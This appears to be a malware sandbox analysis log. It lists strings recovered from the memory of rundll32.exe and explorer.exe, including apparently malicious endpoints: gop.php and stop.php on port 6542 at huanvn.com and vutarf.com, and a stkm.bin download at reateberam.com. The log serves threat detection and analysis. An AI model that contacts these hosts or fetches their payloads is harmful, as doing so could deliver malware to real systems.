Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.o
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: explorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lew
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000000.2321862445.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4544441283.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000000.2321008105.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4540619614.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3095470555.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3857371736.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/.5
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3405117-2476756634-1003
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/Z#q
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/eo
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/m
Source: explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4538744172.00000000031FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/E
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/N#e
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/a
Source: explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/ys
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/uo
Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/P
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/Q
Source: rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/~C
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php5
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php6)
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpK
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpn)?
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.php
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.binSL
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bino
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/p
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/q
Source: explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54
Source: explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19
Source: explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4560
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4560D
Source: explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/X
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/t60G
Source: explorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/w
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/
Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/%
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/W
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.php
Source: rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpo
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpu
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
